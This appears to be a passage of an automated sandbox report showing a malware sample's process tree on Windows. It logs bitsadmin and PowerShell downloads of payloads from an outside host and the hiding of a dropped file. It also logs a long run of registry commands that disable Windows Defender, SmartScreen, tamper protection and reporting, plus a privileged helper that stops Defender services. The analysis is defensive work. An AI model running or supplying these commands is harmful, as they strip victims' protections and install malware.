- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:324

C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\ProgramData\ConsoleApp\ControlSet000.bat" "
3⤵
- Suspicious use of WriteProcessMemory
PID:1828

C:\Windows\SysWOW64\bitsadmin.exe
bitsadmin /transfer Explorers /download /priority FOREGROUND http://xuiklxus.xyz/wlanext32.exe C:\Users\Admin\AppData\Local\Temp\wlanext32.exe
4⤵
- Download via BitsAdmin
PID:1900

C:\Users\Admin\AppData\Local\Temp\wlanext32.exe
wlanext32.exe
4⤵
- Suspicious use of WriteProcessMemory
PID:1628

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c pause
5⤵
PID:1824

C:\Windows\SysWOW64\attrib.exe
ATTRIB +h wlanext32.exe
4⤵
- Views/modifies file attributes
PID:784

C:\Windows\SysWOW64\PING.EXE
Ping -n 3 127.0.0.1
4⤵
- Runs ping.exe
PID:1744

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
- Runs ping.exe
PID:1476

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
PID:1032

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
PID:1592

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
PID:1464

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
- Runs ping.exe
PID:1204

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
- Runs ping.exe
PID:1344

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
- Runs ping.exe
PID:1900

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
PID:2008

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
PID:1864

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
- Runs ping.exe
PID:560

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
PID:344

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
- Runs ping.exe
PID:2016

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
- Runs ping.exe
PID:1972

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
PID:644

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
- Runs ping.exe
PID:784

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
PID:1056

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
- Runs ping.exe
PID:2004

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
- Runs ping.exe
PID:884

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
- Runs ping.exe
PID:1064

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
PID:1256

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
- Runs ping.exe
PID:1080

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
PID:1200

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
PID:276

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
- Runs ping.exe
PID:1076

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
PID:1608

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
PID:1996

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
- Runs ping.exe
PID:1164

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
PID:1256

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
- Runs ping.exe
PID:1344

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
- Runs ping.exe
PID:984

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
- Runs ping.exe
PID:1864

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
PID:1128

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
- Runs ping.exe
PID:956

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
- Runs ping.exe
PID:1612

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
- Runs ping.exe
PID:320

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
- Runs ping.exe
PID:1464

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
PID:1204

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
- Runs ping.exe
PID:1584

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
PID:1624

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
PID:436

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
- Runs ping.exe
PID:1072

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
- Runs ping.exe
PID:1692

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
- Runs ping.exe
PID:1996

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
- Runs ping.exe
PID:1464

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
PID:948

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
- Runs ping.exe
PID:784

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
- Runs ping.exe
PID:1624

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
- Runs ping.exe
PID:1008

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
- Runs ping.exe
PID:1924

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
- Runs ping.exe
PID:884

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
PID:1608

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
- Runs ping.exe
PID:1692

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
PID:1292

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
PID:952

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
- Runs ping.exe
PID:1204

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
- Runs ping.exe
PID:1900

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
- Runs ping.exe
PID:1752

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
- Runs ping.exe
PID:1944

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
- Runs ping.exe
PID:1820

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
- Runs ping.exe
PID:1412

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
- Runs ping.exe
PID:344

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
PID:1972

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
- Runs ping.exe
PID:456

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
- Runs ping.exe
PID:1288

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
PID:328

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
PID:1516

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
PID:1096

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
PID:1752

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
PID:1820

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
- Runs ping.exe
PID:1292

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
- Runs ping.exe
PID:852

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
- Runs ping.exe
PID:1556

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
PID:908

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
PID:1292

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
PID:888

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
- Runs ping.exe
PID:396

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
PID:1924

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
- Runs ping.exe
PID:1556

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
- Runs ping.exe
PID:1696

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
PID:1292

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
- Runs ping.exe
PID:1256

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
- Runs ping.exe
PID:1060

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
PID:1556

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
PID:1592

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
- Runs ping.exe
PID:364

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
- Runs ping.exe
PID:2016

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
- Runs ping.exe
PID:1064

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
- Runs ping.exe
PID:1308

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
- Runs ping.exe
PID:1996

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
- Runs ping.exe
PID:1620

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
- Runs ping.exe
PID:1256

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
PID:1512

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
- Runs ping.exe
PID:1296

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
PID:984

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
- Runs ping.exe
PID:1924

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
- Runs ping.exe
PID:436

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
PID:1008

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
PID:1608

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
- Runs ping.exe
PID:1344

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
- Runs ping.exe
PID:644

C:\Windows\SysWOW64\PING.EXE
Ping -n 3 127.0.0.1
4⤵
- Runs ping.exe
PID:1032

C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\ProgramData\ConsoleApp\main.bat" "
3⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1924

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "(New-Object Net.WebClient).DownloadFile('http://xuiklxus.xyz/hfile.bin', 'hfile.bin')"
4⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:396

C:\ProgramData\ConsoleApp\7za.exe
7za.exe x -y -p1234 "*.7z"
4⤵
- Executes dropped EXE
PID:1740

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\ProgramData\ConsoleApp\ControlSet003.vbs"
4⤵
PID:936

C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\ProgramData\ConsoleApp\ControlSet001.bat" "
5⤵
- Loads dropped DLL
PID:1180

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Microsoft\Windows Defender" /v "DisableAntiVirus" /t reg_DWORD /d "1" /f
6⤵
PID:1732

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" /v "TamperProtection" /t reg_DWORD /d "4" /f
6⤵
PID:1740

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" /v "TamperProtectionSource" /t reg_DWORD /d "2" /f
6⤵
PID:1892

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" /v "DisablePrivacyMode" /t reg_DWORD /d "1" /f
6⤵
PID:1612

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SYSTEM\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t reg_DWORD /d "0" /f
6⤵
PID:1632

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SYSTEM\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t reg_DWORD /d "0" /f
6⤵
PID:2024

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\MRT" /v "DontOfferThroughWUAU" /t reg_DWORD /d 1 /f
6⤵
PID:1384

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\MRT" /v "DontReportInfectionInformation" /t reg_DWORD /d 1 /f
6⤵
PID:108

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Microsoft\RemovalTools\MpGears" /v "SpyNetReportingLocation" /t reg_DWORD /d 0 /f
6⤵
PID:1548

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\System" /v "EnableSmartScreen" /t reg_DWORD /d 0 /f
6⤵
PID:984

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\MicrosoftEdge\PhishingFilter" /v "EnabledV9" /t reg_DWORD /d 0 /f
6⤵
PID:548

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\MicrosoftEdge\PhishingFilter" /v "PreventOverride" /t reg_DWORD /d 0 /f
6⤵
PID:1936

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer\PhishingFilter" /v "EnabledV9" /t reg_DWORD /d 0 /f
6⤵
PID:1128

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer\PhishingFilter" /v "PreventOverride" /t reg_DWORD /d 0 /f
6⤵
PID:1536

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer" /v "SmartScreenEnabled" /t reg_SZ /d "Off" /f
6⤵
PID:1072

C:\Windows\SysWOW64\reg.exe
reg add "HKCU\SOFTWARE\Policies\Microsoft\Edge" /v "SmartScreenEnabled" /t reg_DWORD /d 0 /f
6⤵
PID:1692

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\AppHost" /v "SmartScreenEnabled" /t reg_SZ /d "Off" /f
6⤵
PID:1696

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\AppHost" /v "EnableWebContentEvaluation" /t reg_DWORD /d 0 /f
6⤵
PID:2016

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\AppHost" /v "PreventOverride" /t reg_DWORD /d 0 /f
6⤵
PID:1464

C:\Windows\SysWOW64\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\AppHost" /v "EnableWebContentEvaluation" /t reg_DWORD /d 0 /f
6⤵
PID:1204

C:\Windows\SysWOW64\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\AppHost" /v "PreventOverride" /t reg_DWORD /d 0 /f
6⤵
PID:952

C:\Windows\SysWOW64\reg.exe
reg add "HKCU\Software\Microsoft\Windows Security Health\State" /v "AppAndBrowser_EdgeSmartScreenOff" /t REG_DWORD /d 0 /f
6⤵
PID:1900

C:\Windows\SysWOW64\reg.exe
reg add "HKCU\Software\Microsoft\Windows Security Health\State" /v "AppAndBrowser_StoreAppsSmartScreenOff" /t reg_DWORD /d 0 /f
6⤵
PID:1944

C:\Windows\SysWOW64\reg.exe
reg add "HKCU\Software\Microsoft\Windows Security Health\State" /v "AccountProtection_MicrosoftAccount_Disconnected" /t REG_DWORD /d 1 /f
6⤵
PID:1512

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "RandomizeScheduleTaskTimes" /t reg_DWORD /d "0" /f
6⤵
PID:1876

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "PUAProtection" /t reg_DWORD /d "0" /f
6⤵
PID:1008

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t reg_DWORD /d 1 /f
6⤵
PID:2000

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions" /v "DisableAutoExclusions" /t reg_DWORD /d "1" /f
6⤵
PID:1564

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t reg_DWORD /d "0" /f
6⤵
PID:1692

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Quarantine" /v "PurgeItemsAfterDelay" /t reg_DWORD /d "0" /f
6⤵
PID:1696

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Quarantine" /v "LocalSettingOverridePurgeItemsAfterDelay" /t reg_DWORD /d "0" /f
6⤵
PID:2024

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t reg_DWORD /d "1" /f
6⤵
PID:1064

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t reg_DWORD /d "1" /f
6⤵
PID:1468

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t reg_DWORD /d "1" /f
6⤵
PID:1276

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRoutinelyTakingAction" /t reg_DWORD /d "1" /f
6⤵
PID:752

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t reg_DWORD /d "1" /f
6⤵
PID:1584

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScriptScanning" /t reg_DWORD /d "1" /f
6⤵
PID:852

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t reg_DWORD /d "1" /f
6⤵
PID:1944

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Remediation" /v "Scan_ScheduleDay" /t reg_DWORD /d "8" /f
6⤵
PID:368

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Remediation" /v "Scan_ScheduleTime" /t reg_DWORD /d 0 /f
6⤵
PID:276

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting" /v "AdditionalActionTimeOut" /t reg_DWORD /d 0 /f
6⤵
PID:1876

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting" /v "CriticalFailureTimeOut" /t reg_DWORD /d 0 /f
6⤵
PID:1072

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting" /v "NonCriticalTimeOut" /t reg_DWORD /d 0 /f
6⤵
PID:1076

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting" /v "DisableGenericRePorts" /t reg_DWORD /d 1 /f
6⤵
PID:1196

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t reg_DWORD /d "1" /f
6⤵
PID:1892

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "AvgCPULoadFactor" /t reg_DWORD /d "10" /f
6⤵
PID:1616

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "DisableArchiveScanning" /t reg_DWORD /d "1" /f
6⤵
PID:1472

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "DisableCatchupFullScan" /t reg_DWORD /d "1" /f
6⤵
PID:1996

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "DisableCatchupQuickScan" /t reg_DWORD /d "1" /f
6⤵
PID:1384

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "DisableRemovableDriveScanning" /t reg_DWORD /d "1" /f
6⤵
PID:1292

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "DisableRestorePoint" /t reg_DWORD /d "1" /f
6⤵
PID:108

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "DisableScanningMappedNetworkDrivesForFullScan" /t reg_DWORD /d "1" /f
6⤵
PID:364

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "DisableScanningNetworkFiles" /t reg_DWORD /d "1" /f
6⤵
PID:752

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "PurgeItemsAfterDelay" /t reg_DWORD /d 0 /f
6⤵
PID:784

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "ScheduleDay" /t reg_DWORD /d 8 /f
6⤵
PID:1556

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "ScheduleTime" /t reg_DWORD /d 0 /f
6⤵
PID:1208

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "ScanOnlyIfIdle" /t reg_DWORD /d 0 /f
6⤵
PID:1864

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "ScanParameters" /t reg_DWORD /d 0 /f
6⤵
PID:1008

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Signature Updates" /v "FirstAuGracePeriod" /t reg_DWORD /d "0" /f
6⤵
PID:1876

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Signature Updates" /v "DisableUpdateOnStartupWithoutEngine" /t reg_DWORD /d 1 /f
6⤵
PID:1076

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Signature Updates" /v "ScheduleDay" /t reg_DWORD /d 8 /f
6⤵
PID:344

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Signature Updates" /v "ScheduleTime" /t reg_DWORD /d 0 /f
6⤵
PID:2040

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Signature Updates" /v "SignatureUpdateCatchupInterval" /t reg_DWORD /d 0 /f
6⤵
PID:1696

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\SmartScreen" /v "ConfigureAppInstallControl" /t reg_SZ /d "Anywhere" /f
6⤵
PID:1620

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\SmartScreen" /v "ConfigureAppInstallControlEnabled" /t REG_DWORD /d 1 /f
6⤵
PID:1384

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t reg_DWORD /d "1" /f
6⤵
PID:328

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t reg_DWORD /d "0" /f
6⤵
PID:1516

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReportingLocation" /t reg_MULTI_SZ /d "0" /f
6⤵
PID:364

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t reg_DWORD /d "2" /f
6⤵
PID:984

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "LocalSettingOverrideSpynetReporting" /t reg_DWORD /d 0 /f
6⤵
PID:1584

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Systray" /v "HideSystray" /t reg_DWORD /d "1" /f
6⤵
PID:1556

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications" /v "DisableNotifications" /t reg_DWORD /d "1" /f
6⤵
- Modifies Windows Defender notification settings
PID:1936

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications" /v "DisableEnhancedNotifications" /t reg_DWORD /d "1" /f
6⤵
- Modifies Windows Defender notification settings
PID:1864

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /t reg_BINARY /d "030000000000000000000000" /f
6⤵
PID:276

C:\ProgramData\ConsoleApp\kernel32.exe
kernel32 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\Sense" /v "Start" /t reg_DWORD /d "4" /f
6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:888

C:\ProgramData\ConsoleApp\kernel32.exe
"C:\ProgramData\ConsoleApp\kernel32.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\Sense" /v "Start" /t reg_DWORD /d "4" /f
7⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1200

C:\ProgramData\ConsoleApp\kernel32.exe
"C:\ProgramData\ConsoleApp\kernel32.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\Sense" /v "Start" /t reg_DWORD /d "4" /f
8⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
PID:1072

C:\Windows\System32\reg.exe
"C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\ControlSet001\Services\Sense" /v "Start" /t reg_DWORD /d "4" /f
9⤵
PID:1632

C:\ProgramData\ConsoleApp\kernel32.exe
kernel32 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdBoot" /v "Start" /t reg_DWORD /d "4" /f
6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1056

C:\ProgramData\ConsoleApp\kernel32.exe
"C:\ProgramData\ConsoleApp\kernel32.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdBoot" /v "Start" /t reg_DWORD /d "4" /f
7⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:976

C:\ProgramData\ConsoleApp\kernel32.exe
